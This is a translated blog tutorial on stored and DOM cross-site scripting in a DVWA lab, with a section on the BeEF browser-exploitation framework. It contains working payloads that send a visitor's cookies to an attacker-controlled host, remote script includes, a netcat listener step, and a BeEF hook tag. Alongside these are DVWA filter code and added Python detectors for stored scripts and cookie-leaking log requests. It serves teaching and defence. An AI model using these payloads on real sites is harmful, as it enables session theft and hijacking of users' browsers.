Little White Diary 49: Kali penetration testing - web penetration - XSS (iii) - stored XSS, DOM XSS, and the BeEF tool

Source: Internet
Author: User

Stored XSS and DOM XSS

(Principle of XSS)

Stored XSS

1. The payload is stored long-term on the server side

2. The JS script executes on every user's visit; the attacker only needs to listen on the specified port

# The exploitation method is roughly the same as for reflected XSS

## Mostly found in message boards and similar places

* Burp Suite is recommended

a. Observe the returned result: is the input data returned intact? Are there any other tags?

The JS code is stored on the server through the message board, so every time the message board link is opened, the XSS popup appears.

b. Test loading a JS file from an attacker-controlled server

# Start apache2 (it listens on port 80 by default)

a.js (steals the client's cookie and sends it to a PHP file on the attacker-controlled server)

var img = new Image();
img.src = "http://192.168.56.102:88/cookies.php?cookie=" + document.cookie;

By default the input length is limited on the client side; use Burp Suite to bypass it, or directly edit the length limit in the HTML. (Good security practice: enforce the length limit on both the client and the server side.)

<script src="http://192.168.56.102/a.js"></script>

### Demonstrating the effect with nc: listen on port 88, then submit the message (or refresh the page) and the cookie is received.
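Two defensive checks for the chain just described, as an added example that is not part of the original post: the first scans stored guestbook rows for script tags and flags external includes whose origin is outside an allowlist (the same scan would catch the BeEF hook.js include shown later in the post); the second parses web log lines and flags requests whose query string carries cookie-looking data, the shape the a.js beacon produces. The guestbook rows, the log lines, the 192.168.56.x hosts, the allowlist and the session cookie names are all constructed for the example.

```python
"""Two defensive checks for a stored-XSS cookie-stealing chain (added example).

(1) scan stored guestbook rows for script tags, separating inline scripts from
    external includes that point outside an allowlist;
(2) scan web log lines for requests whose query string carries cookie data.
All rows, log lines, hosts, the allowlist and cookie names are constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# --- (1) stored content: find script injections in guestbook rows -----------

# Constructed sample rows; the two script payloads mirror the shapes in the post.
GUESTBOOK_ROWS = [
    {"name": "alice", "comment": "Nice site!"},
    {"name": "bob", "comment": '<script src="http://192.168.56.102/a.js"></script>'},
    {"name": "carol", "comment": "<b>bold</b> text"},
    {"name": "dave", "comment": '<SCRIPT>var img=new Image();img.src='
                               '"http://192.168.56.102:88/cookies.php?cookie="+document.cookie;</SCRIPT>'},
]

# Hypothetical allowlist of origins from which the app legitimately loads scripts.
ALLOWED_SCRIPT_ORIGINS = {"http://192.168.56.101", "https://cdn.example.com"}

SCRIPT_TAG_RE = re.compile(r"<script\b", re.I)
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def origin_of(url):
    """scheme://host[:port] of an absolute URL, '' for relative ones."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""


def find_script_injections(rows):
    """Return (row_index, field, kind) for every field that holds a script tag.

    kind is 'external' when a src attribute points outside the allowlist and
    'inline' otherwise. User-supplied fields should contain no script at all,
    so both kinds are findings; 'external' is the remote-loader pattern.
    """
    findings = []
    for idx, row in enumerate(rows):
        for field in ("name", "comment"):
            value = row[field]
            if not SCRIPT_TAG_RE.search(value):
                continue
            srcs = SCRIPT_SRC_RE.findall(value)
            external = [s for s in srcs if origin_of(s) not in ALLOWED_SCRIPT_ORIGINS]
            findings.append((idx, field, "external" if external else "inline"))
    return findings


# --- (2) web logs: requests that carry cookie data in the query string -------

# Constructed lines in Apache combined format, as an egress proxy might record them.
SAMPLE_LOG = """\
192.168.56.1 - - [12/Mar/2015:10:01:02 +0000] "GET /dvwa/vulnerabilities/xss_s/ HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.168.56.1 - - [12/Mar/2015:10:01:03 +0000] "GET http://192.168.56.102/a.js HTTP/1.1" 200 96 "http://192.168.56.101/dvwa/vulnerabilities/xss_s/" "Mozilla/5.0"
192.168.56.1 - - [12/Mar/2015:10:01:04 +0000] "GET http://192.168.56.102:88/cookies.php?cookie=security%3Dlow%3B%20PHPSESSID%3Dabc123 HTTP/1.1" 200 12 "http://192.168.56.101/dvwa/vulnerabilities/xss_s/" "Mozilla/5.0"
192.168.56.1 - - [12/Mar/2015:10:01:05 +0000] "GET /search.php?q=cookie+recipe HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Cookie names whose presence inside a query value means session data is leaving (hypothetical list).
SESSION_COOKIE_NAMES = ("PHPSESSID", "JSESSIONID", "security")
COOKIE_PAIR_RE = re.compile(r"(^|;\s*)(%s)=" % "|".join(SESSION_COOKIE_NAMES), re.I)


def query_params(url):
    """Decode the query string into (name, value) pairs. Split only on '&':
    a cookie string legitimately contains ';', which parse_qs may split on in older Pythons."""
    pairs = []
    for chunk in urlsplit(url).query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs


def is_cookie_exfil(url):
    """True when any decoded query value looks like a document.cookie dump."""
    return any(COOKIE_PAIR_RE.search(v) for _, v in query_params(url))


def detect_exfil_requests(log_lines):
    """Return (client_ip, url, referer) for each log line whose URL leaks cookie data."""
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line)
        if not m or not is_cookie_exfil(m["url"]):
            continue
        hits.append((m["ip"], m["url"], m["referer"]))
    return hits


if __name__ == "__main__":
    for f in find_script_injections(GUESTBOOK_ROWS):
        print("stored script in row %d field %s (%s)" % f)
    for ip, url, ref in detect_exfil_requests(SAMPLE_LOG.splitlines()):
        print(f"cookie data leaving via {url} from {ip}, referer {ref}")
```

The referer in a flagged log line tells you which page of your own application carried the injected script, which is where the stored row to clean up lives.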

Code audit (the following code simply filters the input data)

Low

<?php

if (isset($_POST['btnSign']))
{
    $message = trim($_POST['mtxMessage']);
    $name    = trim($_POST['txtName']);

    // Sanitize message input
    $message = stripslashes($message);
    $message = mysql_real_escape_string($message);

    // Sanitize name input
    $name = mysql_real_escape_string($name);

    $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";

    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}

?>

Medium (name input box output: still the original form, but the JS script is rendered as plain text; currently the ideal filtering method)

<?php

if (isset($_POST['btnSign']))
{
    $message = trim($_POST['mtxMessage']);
    $name    = trim($_POST['txtName']);

    // Sanitize message input
    $message = trim(strip_tags(addslashes($message)));   // addslashes(): adds backslashes; strip_tags(): removes HTML tags
    $message = mysql_real_escape_string($message);
    $message = htmlspecialchars($message);               // HTML encoding: < and > are encoded

    // Sanitize name input
    $name = str_replace('<script>', '', $name);          // deletes the literal <script>; can be bypassed by splitting the tag
    $name = mysql_real_escape_string($name);

    $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";

    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}

?>

High

<?php

if (isset($_POST['btnSign']))
{
    $message = trim($_POST['mtxMessage']);
    $name    = trim($_POST['txtName']);

    // Sanitize message input
    $message = stripslashes($message);
    $message = mysql_real_escape_string($message);
    $message = htmlspecialchars($message);

    // Sanitize name input
    $name = stripslashes($name);
    $name = mysql_real_escape_string($name);
    $name = htmlspecialchars($name);

    $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";

    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}

?>
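To make the difference between the three levels concrete, here is an added Python model of the name-field filters (this is not the DVWA PHP above): Low keeps the input as stored, because mysql_real_escape_string only protects the SQL statement and MySQL consumes the backslashes on insert; Medium deletes the literal <script> string; High applies htmlspecialchars. A server-side length check is included because the post notes that the client-side limit alone is bypassable. The inputs, the render fragment, the script check and the MAX_NAME_LENGTH value are constructed for the example.

```python
"""Model of the three DVWA filter levels for the guestbook 'name' field (added example).

Each level is reduced to what survives into the rendered page:
  low    - stored value equals the input (SQL escaping does not change it)
  medium - str_replace('<script>', '', $name): literal, non-recursive deletion
  high   - htmlspecialchars(): characters HTML treats as markup are encoded
"""
import re

MAX_NAME_LENGTH = 10  # hypothetical server-side limit for the example


def htmlspecialchars(s):
    """PHP htmlspecialchars() with its default ENT_COMPAT flags: & " < > encoded, ' left alone."""
    return (s.replace("&", "&amp;")
             .replace('"', "&quot;")
             .replace("<", "&lt;")
             .replace(">", "&gt;"))


def low_name(name):
    # trim() then mysql_real_escape_string(); the stored value is the trimmed input.
    return name.strip()


def medium_name(name):
    # str_replace('<script>', '', $name): deletes every exact '<script>' once, no re-scan.
    return name.strip().replace("<script>", "")


def high_name(name):
    # stripslashes() + mysql_real_escape_string() + htmlspecialchars(): only the last matters for HTML.
    return htmlspecialchars(name.strip())


def render_entry(name):
    """Constructed fragment standing in for what the guestbook page emits for a stored name."""
    return f'<div class="entry">Name: {name}</div>'


SCRIPT_OPEN_RE = re.compile(r"<script\b", re.I)


def contains_active_script(html):
    """Conservative check: flags any literal '<script' opening sequence.
    It may over-report on oddly nested tags the browser would not parse, but it never misses a literal tag."""
    return bool(SCRIPT_OPEN_RE.search(html))


def check_length(name):
    """Server-side length check; the client-side maxlength alone can be edited away or bypassed with a proxy."""
    if len(name) > MAX_NAME_LENGTH:
        raise ValueError(f"name longer than {MAX_NAME_LENGTH} characters")
    return name


def compare_levels(name):
    """Apply each level and report whether the rendered fragment still holds a script tag."""
    return {
        level: contains_active_script(render_entry(fn(name)))
        for level, fn in (("low", low_name), ("medium", medium_name), ("high", high_name))
    }


if __name__ == "__main__":
    # Constructed inputs: the plain tag, and the split form the post's note refers to.
    for sample in ("<script>alert(1)</script>", "<scr<script>ipt>alert(1)</script>"):
        print(repr(sample), compare_levels(sample))
```

The deny-list at Medium passes the plain tag but reassembles the split one, which is why the post calls encoding the ideal filter: htmlspecialchars does not try to recognise attacks, it makes the characters that create markup inert for the HTML text context. Encoding is best applied at output time, per context, rather than before storage, so the same stored value can be emitted safely into HTML, an attribute or JSON.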

DOM XSS

DOM: a set of standard APIs that JS and other languages can call

# Essentially the same as the src-based method used in reflected XSS; only the function call differs.

<script>var img = document.createElement("img"); img.src = "http://192.168.56.102:88/cookies.php?cookie=" + escape(document.cookie);</script>

BeEF

BeEF is currently the most popular browser attack framework in Europe and America; its full name is the Browser Exploitation Framework project.

Can be used to build interactive payloads (contains many modules and payloads)

Written in Ruby

Server side: manages the hooked clients

Client: a JavaScript script running in the client's browser

Browser attack surface

Applications have generally moved to the B/S architecture, so the browser has become the unified client program

Most browser attacks require a social engineering approach

Attacking browser users

Using the browser to attack other websites by injecting JS

Attack methods

Exploit an XSS vulnerability on a website

Entice the client into visiting a fake site that contains the hook

Inject the hook script through a man-in-the-middle attack

Common uses

Keylogger

Network scan

Browser Information collection

Bind Shell

Integration with Metasploit

a. The default login account and password are beef/beef

b. <script src="http://127.0.0.1:3000/hook.js"></script>

c. Modules

1. Browser: browser type (can obtain the cookie, OS and other information)

(Click the corresponding module to use it; the response is slow. Green: applicable; orange: also usable, but the client user will notice; red: probably not usable; gray: unknown whether usable)

2. Exploits: exploit modules

3. Network (the hooked browser can be used as a zombie machine)

4. Persistence: after the page is closed (while the host is still online), the hooked client can still be operated on (persistent hook; it is recommended to do this immediately once a host is compromised)

